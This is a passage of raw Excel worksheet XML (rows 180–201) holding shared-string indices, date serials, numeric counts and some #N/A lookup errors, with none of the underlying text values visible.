      <c r="E180" s="1" t="s">
        <v>1754</v>
      </c>
      <c r="F180" s="43">
        <v>122</v>
      </c>
      <c r="G180" s="1" t="s">
        <v>1755</v>
      </c>
      <c r="H180" s="1" t="s">
        <v>1756</v>
      </c>
      <c r="I180" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J180" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K180" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L180" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M180" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N180" s="1" t="s">
        <v>167</v>
      </c>
      <c r="O180" s="1" t="s">
        <v>1757</v>
      </c>
      <c r="P180" s="1"/>
      <c r="Q180" s="1" t="s">
        <v>3563</v>
      </c>
      <c r="R180" s="83">
        <v>131801</v>
      </c>
      <c r="S180" s="83">
        <v>139572</v>
      </c>
      <c r="T180" s="83">
        <v>239616</v>
      </c>
      <c r="U180" s="83">
        <v>708788</v>
      </c>
      <c r="V180" s="83">
        <v>727682</v>
      </c>
      <c r="W180" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="181" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A181" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B181" s="51">
        <v>44439.444533761576</v>
      </c>
      <c r="C181" s="1" t="s">
        <v>1758</v>
      </c>
      <c r="D181" s="43">
        <v>101</v>
      </c>
      <c r="E181" s="1" t="s">
        <v>1759</v>
      </c>
      <c r="F181" s="43">
        <v>101</v>
      </c>
      <c r="G181" s="1" t="s">
        <v>1760</v>
      </c>
      <c r="H181" s="1" t="s">
        <v>1761</v>
      </c>
      <c r="I181" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J181" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K181" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L181" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M181" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N181" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O181" s="1"/>
      <c r="P181" s="1"/>
      <c r="Q181" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R181" s="83">
        <v>2935</v>
      </c>
      <c r="S181" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T181" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U181" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V181" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W181" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="182" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A182" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B182" s="51">
        <v>44677.641968946758</v>
      </c>
      <c r="C182" s="1" t="s">
        <v>1762</v>
      </c>
      <c r="D182" s="43">
        <v>100</v>
      </c>
      <c r="E182" s="1" t="s">
        <v>1763</v>
      </c>
      <c r="F182" s="26">
        <v>100</v>
      </c>
      <c r="G182" s="57" t="s">
        <v>1764</v>
      </c>
      <c r="H182" s="1" t="s">
        <v>1765</v>
      </c>
      <c r="I182" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J182" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K182" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L182" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M182" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="N182" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="O182" s="1"/>
      <c r="P182" s="1"/>
      <c r="Q182" s="1" t="s">
        <v>3564</v>
      </c>
      <c r="R182" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S182" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T182" s="83">
        <v>12</v>
      </c>
      <c r="U182" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V182" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W182" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="183" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A183" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B183" s="51">
        <v>44434.519642870371</v>
      </c>
      <c r="C183" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D183" s="43">
        <v>150</v>
      </c>
      <c r="E183" s="1" t="s">
        <v>1770</v>
      </c>
      <c r="F183" s="43">
        <v>200</v>
      </c>
      <c r="G183" s="1" t="s">
        <v>1771</v>
      </c>
      <c r="H183" s="1" t="s">
        <v>1772</v>
      </c>
      <c r="I183" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J183" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K183" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L183" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M183" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N183" s="1"/>
      <c r="O183" s="1" t="s">
        <v>1773</v>
      </c>
      <c r="P183" s="1"/>
      <c r="Q183" s="1" t="s">
        <v>3565</v>
      </c>
      <c r="R183" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S183" s="83">
        <v>11149</v>
      </c>
      <c r="T183" s="83">
        <v>3530</v>
      </c>
      <c r="U183" s="83">
        <v>6367</v>
      </c>
      <c r="V183" s="83">
        <v>27550</v>
      </c>
      <c r="W183" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="184" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A184" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B184" s="51">
        <v>44495.004373414355</v>
      </c>
      <c r="C184" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D184" s="43">
        <v>150</v>
      </c>
      <c r="E184" s="1" t="s">
        <v>1775</v>
      </c>
      <c r="F184" s="26">
        <v>200</v>
      </c>
      <c r="G184" s="1" t="s">
        <v>1776</v>
      </c>
      <c r="H184" s="1" t="s">
        <v>1780</v>
      </c>
      <c r="I184" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J184" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K184" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L184" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M184" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N184" s="1"/>
      <c r="O184" s="1" t="s">
        <v>1773</v>
      </c>
      <c r="P184" s="1"/>
      <c r="Q184" s="1" t="s">
        <v>3565</v>
      </c>
      <c r="R184" s="83">
        <v>16</v>
      </c>
      <c r="S184" s="83">
        <v>157</v>
      </c>
      <c r="T184" s="83">
        <v>114582</v>
      </c>
      <c r="U184" s="83">
        <v>567210</v>
      </c>
      <c r="V184" s="83">
        <v>539779</v>
      </c>
      <c r="W184" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="185" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A185" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B185" s="51">
        <v>44434.519642858795</v>
      </c>
      <c r="C185" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D185" s="43">
        <v>150</v>
      </c>
      <c r="E185" s="1" t="s">
        <v>1781</v>
      </c>
      <c r="F185" s="26">
        <v>111</v>
      </c>
      <c r="G185" s="1" t="s">
        <v>1782</v>
      </c>
      <c r="H185" s="1" t="s">
        <v>1783</v>
      </c>
      <c r="I185" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J185" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K185" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L185" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M185" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N185" s="1"/>
      <c r="O185" s="1"/>
      <c r="P185" s="1"/>
      <c r="Q185" s="1" t="s">
        <v>3565</v>
      </c>
      <c r="R185" s="83">
        <v>1518</v>
      </c>
      <c r="S185" s="83">
        <v>1042</v>
      </c>
      <c r="T185" s="83">
        <v>827</v>
      </c>
      <c r="U185" s="83">
        <v>1561</v>
      </c>
      <c r="V185" s="83">
        <v>1116</v>
      </c>
      <c r="W185" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="186" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A186" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B186" s="51">
        <v>44509.006856018517</v>
      </c>
      <c r="C186" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D186" s="43">
        <v>150</v>
      </c>
      <c r="E186" s="1" t="s">
        <v>1784</v>
      </c>
      <c r="F186" s="26">
        <v>210</v>
      </c>
      <c r="G186" s="1" t="s">
        <v>1785</v>
      </c>
      <c r="H186" s="1" t="s">
        <v>1786</v>
      </c>
      <c r="I186" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J186" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K186" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L186" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M186" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N186" s="1"/>
      <c r="O186" s="1" t="s">
        <v>1773</v>
      </c>
      <c r="P186" s="1"/>
      <c r="Q186" s="1" t="s">
        <v>3565</v>
      </c>
      <c r="R186" s="83">
        <v>11</v>
      </c>
      <c r="S186" s="83">
        <v>20</v>
      </c>
      <c r="T186" s="83">
        <v>11</v>
      </c>
      <c r="U186" s="83">
        <v>3</v>
      </c>
      <c r="V186" s="83">
        <v>6</v>
      </c>
      <c r="W186" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="187" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A187" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B187" s="51">
        <v>44434.51964283565</v>
      </c>
      <c r="C187" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D187" s="43">
        <v>150</v>
      </c>
      <c r="E187" s="1" t="s">
        <v>1787</v>
      </c>
      <c r="F187" s="43">
        <v>131</v>
      </c>
      <c r="G187" s="1" t="s">
        <v>1788</v>
      </c>
      <c r="H187" s="1" t="s">
        <v>1789</v>
      </c>
      <c r="I187" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J187" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K187" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L187" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M187" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N187" s="1"/>
      <c r="O187" s="1" t="s">
        <v>1790</v>
      </c>
      <c r="P187" s="1"/>
      <c r="Q187" s="1" t="s">
        <v>3565</v>
      </c>
      <c r="R187" s="83">
        <v>7338</v>
      </c>
      <c r="S187" s="83">
        <v>10142</v>
      </c>
      <c r="T187" s="83">
        <v>5228</v>
      </c>
      <c r="U187" s="83">
        <v>4926</v>
      </c>
      <c r="V187" s="83">
        <v>5292</v>
      </c>
      <c r="W187" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="188" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A188" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B188" s="51">
        <v>44274.679742268519</v>
      </c>
      <c r="C188" s="1" t="s">
        <v>2142</v>
      </c>
      <c r="D188" s="43">
        <v>112</v>
      </c>
      <c r="E188" s="1" t="s">
        <v>2143</v>
      </c>
      <c r="F188" s="26">
        <v>112</v>
      </c>
      <c r="G188" s="1" t="s">
        <v>1669</v>
      </c>
      <c r="H188" s="1" t="s">
        <v>2144</v>
      </c>
      <c r="I188" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J188" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K188" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L188" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M188" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N188" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O188" s="1"/>
      <c r="P188" s="1"/>
      <c r="Q188" s="1" t="s">
        <v>3566</v>
      </c>
      <c r="R188" s="83">
        <v>83189</v>
      </c>
      <c r="S188" s="83">
        <v>86211</v>
      </c>
      <c r="T188" s="83">
        <v>67132</v>
      </c>
      <c r="U188" s="83">
        <v>77246</v>
      </c>
      <c r="V188" s="83">
        <v>106431</v>
      </c>
      <c r="W188" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="189" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A189" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B189" s="51">
        <v>44655.603482025464</v>
      </c>
      <c r="C189" s="1" t="s">
        <v>2241</v>
      </c>
      <c r="D189" s="26">
        <v>100</v>
      </c>
      <c r="E189" s="1" t="s">
        <v>2242</v>
      </c>
      <c r="F189" s="26">
        <v>100</v>
      </c>
      <c r="G189" s="57" t="s">
        <v>2243</v>
      </c>
      <c r="H189" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I189" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J189" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K189" s="3" t="s">
        <v>29</v>
      </c>
      <c r="L189" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M189" s="3" t="s">
        <v>72</v>
      </c>
      <c r="N189" s="1"/>
      <c r="O189" s="1"/>
      <c r="P189" s="1"/>
      <c r="Q189" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R189" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S189" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T189" s="83">
        <v>1</v>
      </c>
      <c r="U189" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V189" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W189" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="190" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A190" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B190" s="51">
        <v>44655.603482037041</v>
      </c>
      <c r="C190" s="1" t="s">
        <v>2241</v>
      </c>
      <c r="D190" s="26">
        <v>100</v>
      </c>
      <c r="E190" s="1" t="s">
        <v>2244</v>
      </c>
      <c r="F190" s="26">
        <v>100</v>
      </c>
      <c r="G190" s="57" t="s">
        <v>2245</v>
      </c>
      <c r="H190" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I190" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J190" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K190" s="1" t="s">
        <v>29</v>
      </c>
      <c r="L190" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M190" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N190" s="1"/>
      <c r="O190" s="1"/>
      <c r="P190" s="1"/>
      <c r="Q190" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R190" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S190" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T190" s="83">
        <v>2</v>
      </c>
      <c r="U190" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V190" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W190" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="191" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A191" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B191" s="51">
        <v>44655.627096875003</v>
      </c>
      <c r="C191" s="1" t="s">
        <v>2246</v>
      </c>
      <c r="D191" s="26">
        <v>100</v>
      </c>
      <c r="E191" s="1" t="s">
        <v>2247</v>
      </c>
      <c r="F191" s="26">
        <v>100</v>
      </c>
      <c r="G191" s="57" t="s">
        <v>2248</v>
      </c>
      <c r="H191" s="1" t="s">
        <v>2249</v>
      </c>
      <c r="I191" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J191" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K191" s="1" t="s">
        <v>29</v>
      </c>
      <c r="L191" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M191" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N191" s="1"/>
      <c r="O191" s="1"/>
      <c r="P191" s="1"/>
      <c r="Q191" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R191" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S191" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T191" s="83">
        <v>7</v>
      </c>
      <c r="U191" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V191" s="83">
        <v>1</v>
      </c>
      <c r="W191" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="192" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A192" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B192" s="51">
        <v>44655.627096886572</v>
      </c>
      <c r="C192" s="1" t="s">
        <v>2246</v>
      </c>
      <c r="D192" s="26">
        <v>100</v>
      </c>
      <c r="E192" s="1" t="s">
        <v>2250</v>
      </c>
      <c r="F192" s="26">
        <v>100</v>
      </c>
      <c r="G192" s="57" t="s">
        <v>2251</v>
      </c>
      <c r="H192" s="1" t="s">
        <v>2252</v>
      </c>
      <c r="I192" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J192" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K192" s="1" t="s">
        <v>29</v>
      </c>
      <c r="L192" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M192" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N192" s="1"/>
      <c r="O192" s="1"/>
      <c r="P192" s="1"/>
      <c r="Q192" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R192" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S192" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T192" s="83">
        <v>175</v>
      </c>
      <c r="U192" s="83">
        <v>56</v>
      </c>
      <c r="V192" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W192" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="193" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A193" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B193" s="51">
        <v>44655.421492361114</v>
      </c>
      <c r="C193" s="1" t="s">
        <v>2253</v>
      </c>
      <c r="D193" s="26">
        <v>100</v>
      </c>
      <c r="E193" s="1" t="s">
        <v>2254</v>
      </c>
      <c r="F193" s="26">
        <v>100</v>
      </c>
      <c r="G193" s="57" t="s">
        <v>2255</v>
      </c>
      <c r="H193" s="1" t="s">
        <v>2256</v>
      </c>
      <c r="I193" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J193" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K193" s="1" t="s">
        <v>29</v>
      </c>
      <c r="L193" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M193" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N193" s="1"/>
      <c r="O193" s="1"/>
      <c r="P193" s="1"/>
      <c r="Q193" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R193" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S193" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T193" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U193" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V193" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W193" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="194" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A194" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B194" s="51">
        <v>44655.421492384259</v>
      </c>
      <c r="C194" s="1" t="s">
        <v>2253</v>
      </c>
      <c r="D194" s="26">
        <v>100</v>
      </c>
      <c r="E194" s="1" t="s">
        <v>2257</v>
      </c>
      <c r="F194" s="26">
        <v>100</v>
      </c>
      <c r="G194" s="57" t="s">
        <v>2258</v>
      </c>
      <c r="H194" s="1" t="s">
        <v>2259</v>
      </c>
      <c r="I194" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J194" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K194" s="1" t="s">
        <v>29</v>
      </c>
      <c r="L194" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M194" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N194" s="1"/>
      <c r="O194" s="1"/>
      <c r="P194" s="1"/>
      <c r="Q194" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R194" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S194" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T194" s="83">
        <v>348</v>
      </c>
      <c r="U194" s="83">
        <v>108</v>
      </c>
      <c r="V194" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W194" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="195" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A195" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B195" s="51">
        <v>44441.927696087965</v>
      </c>
      <c r="C195" s="1" t="s">
        <v>2260</v>
      </c>
      <c r="D195" s="43">
        <v>110</v>
      </c>
      <c r="E195" s="1" t="s">
        <v>2261</v>
      </c>
      <c r="F195" s="26">
        <v>110</v>
      </c>
      <c r="G195" s="1" t="s">
        <v>2262</v>
      </c>
      <c r="H195" s="1" t="s">
        <v>2263</v>
      </c>
      <c r="I195" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J195" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K195" s="1" t="s">
        <v>29</v>
      </c>
      <c r="L195" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M195" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N195" s="1"/>
      <c r="O195" s="1" t="s">
        <v>2264</v>
      </c>
      <c r="P195" s="1"/>
      <c r="Q195" s="1" t="s">
        <v>3567</v>
      </c>
      <c r="R195" s="83">
        <v>12158107</v>
      </c>
      <c r="S195" s="83">
        <v>11019709</v>
      </c>
      <c r="T195" s="83">
        <v>10110539</v>
      </c>
      <c r="U195" s="83">
        <v>10245697</v>
      </c>
      <c r="V195" s="83">
        <v>11407036</v>
      </c>
      <c r="W195" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="196" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A196" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B196" s="51">
        <v>44099.490264282409</v>
      </c>
      <c r="C196" s="1" t="s">
        <v>2266</v>
      </c>
      <c r="D196" s="43">
        <v>101</v>
      </c>
      <c r="E196" s="1" t="s">
        <v>2267</v>
      </c>
      <c r="F196" s="43">
        <v>101</v>
      </c>
      <c r="G196" s="1" t="s">
        <v>2268</v>
      </c>
      <c r="H196" s="1" t="s">
        <v>2269</v>
      </c>
      <c r="I196" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J196" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K196" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L196" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M196" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N196" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O196" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P196" s="1"/>
      <c r="Q196" s="1" t="s">
        <v>2270</v>
      </c>
      <c r="R196" s="83">
        <v>2246</v>
      </c>
      <c r="S196" s="83">
        <v>1721</v>
      </c>
      <c r="T196" s="83">
        <v>1861</v>
      </c>
      <c r="U196" s="83">
        <v>1804</v>
      </c>
      <c r="V196" s="83">
        <v>2007</v>
      </c>
      <c r="W196" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="197" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A197" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B197" s="51">
        <v>44441.431199270832</v>
      </c>
      <c r="C197" s="1" t="s">
        <v>2275</v>
      </c>
      <c r="D197" s="43">
        <v>101</v>
      </c>
      <c r="E197" s="1" t="s">
        <v>2276</v>
      </c>
      <c r="F197" s="26">
        <v>101</v>
      </c>
      <c r="G197" s="1" t="s">
        <v>2277</v>
      </c>
      <c r="H197" s="1" t="s">
        <v>2278</v>
      </c>
      <c r="I197" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J197" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K197" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L197" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M197" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N197" s="1" t="s">
        <v>522</v>
      </c>
      <c r="O197" s="1"/>
      <c r="P197" s="1"/>
      <c r="Q197" s="1" t="s">
        <v>523</v>
      </c>
      <c r="R197" s="83">
        <v>17617</v>
      </c>
      <c r="S197" s="83">
        <v>12407</v>
      </c>
      <c r="T197" s="83">
        <v>13862</v>
      </c>
      <c r="U197" s="83">
        <v>12495</v>
      </c>
      <c r="V197" s="83">
        <v>11688</v>
      </c>
      <c r="W197" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="198" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A198" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B198" s="51">
        <v>44435.729944456019</v>
      </c>
      <c r="C198" s="1" t="s">
        <v>2279</v>
      </c>
      <c r="D198" s="43">
        <v>122</v>
      </c>
      <c r="E198" s="1" t="s">
        <v>2280</v>
      </c>
      <c r="F198" s="43">
        <v>102</v>
      </c>
      <c r="G198" s="1" t="s">
        <v>2281</v>
      </c>
      <c r="H198" s="1" t="s">
        <v>2282</v>
      </c>
      <c r="I198" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J198" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K198" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L198" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M198" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N198" s="1"/>
      <c r="O198" s="1"/>
      <c r="P198" s="1"/>
      <c r="Q198" s="1" t="s">
        <v>3568</v>
      </c>
      <c r="R198" s="83">
        <v>121</v>
      </c>
      <c r="S198" s="83">
        <v>124</v>
      </c>
      <c r="T198" s="83">
        <v>58</v>
      </c>
      <c r="U198" s="83">
        <v>54</v>
      </c>
      <c r="V198" s="83">
        <v>58</v>
      </c>
      <c r="W198" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="199" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A199" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B199" s="51">
        <v>44209.75518915509</v>
      </c>
      <c r="C199" s="1" t="s">
        <v>2279</v>
      </c>
      <c r="D199" s="43">
        <v>122</v>
      </c>
      <c r="E199" s="1" t="s">
        <v>2284</v>
      </c>
      <c r="F199" s="43">
        <v>101</v>
      </c>
      <c r="G199" s="1" t="s">
        <v>2285</v>
      </c>
      <c r="H199" s="1" t="s">
        <v>2286</v>
      </c>
      <c r="I199" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J199" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K199" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L199" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M199" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N199" s="1"/>
      <c r="O199" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P199" s="1"/>
      <c r="Q199" s="1" t="s">
        <v>3568</v>
      </c>
      <c r="R199" s="83">
        <v>6897</v>
      </c>
      <c r="S199" s="83">
        <v>5840</v>
      </c>
      <c r="T199" s="83">
        <v>4722</v>
      </c>
      <c r="U199" s="83">
        <v>4591</v>
      </c>
      <c r="V199" s="83">
        <v>4572</v>
      </c>
      <c r="W199" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="200" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A200" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B200" s="51">
        <v>44435.729944467595</v>
      </c>
      <c r="C200" s="1" t="s">
        <v>2279</v>
      </c>
      <c r="D200" s="43">
        <v>122</v>
      </c>
      <c r="E200" s="1" t="s">
        <v>2287</v>
      </c>
      <c r="F200" s="43">
        <v>102</v>
      </c>
      <c r="G200" s="1" t="s">
        <v>2288</v>
      </c>
      <c r="H200" s="1" t="s">
        <v>2289</v>
      </c>
      <c r="I200" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J200" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K200" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L200" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M200" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N200" s="1"/>
      <c r="O200" s="1"/>
      <c r="P200" s="1"/>
      <c r="Q200" s="1" t="s">
        <v>3568</v>
      </c>
      <c r="R200" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S200" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T200" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U200" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V200" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W200" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="201" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A201" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B201" s="51">
        <v>44435.729944409723</v>
      </c>
      <c r="C201" s="1" t="s">
        <v>2279</v>
      </c>
      <c r="D201" s="43">
        <v>122</v>
      </c>
      <c r="E201" s="1" t="s">
        <v>2290</v>
      </c>
      <c r="F201" s="43">
        <v>103</v>
      </c>
      <c r="G201" s="1" t="s">
        <v>2291</v>
      </c>
      <c r="H201" s="1" t="s">
        <v>2292</v>
      </c>
      <c r="I201" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J201" s="1" t="s">
        <v>43</v>
      </c>
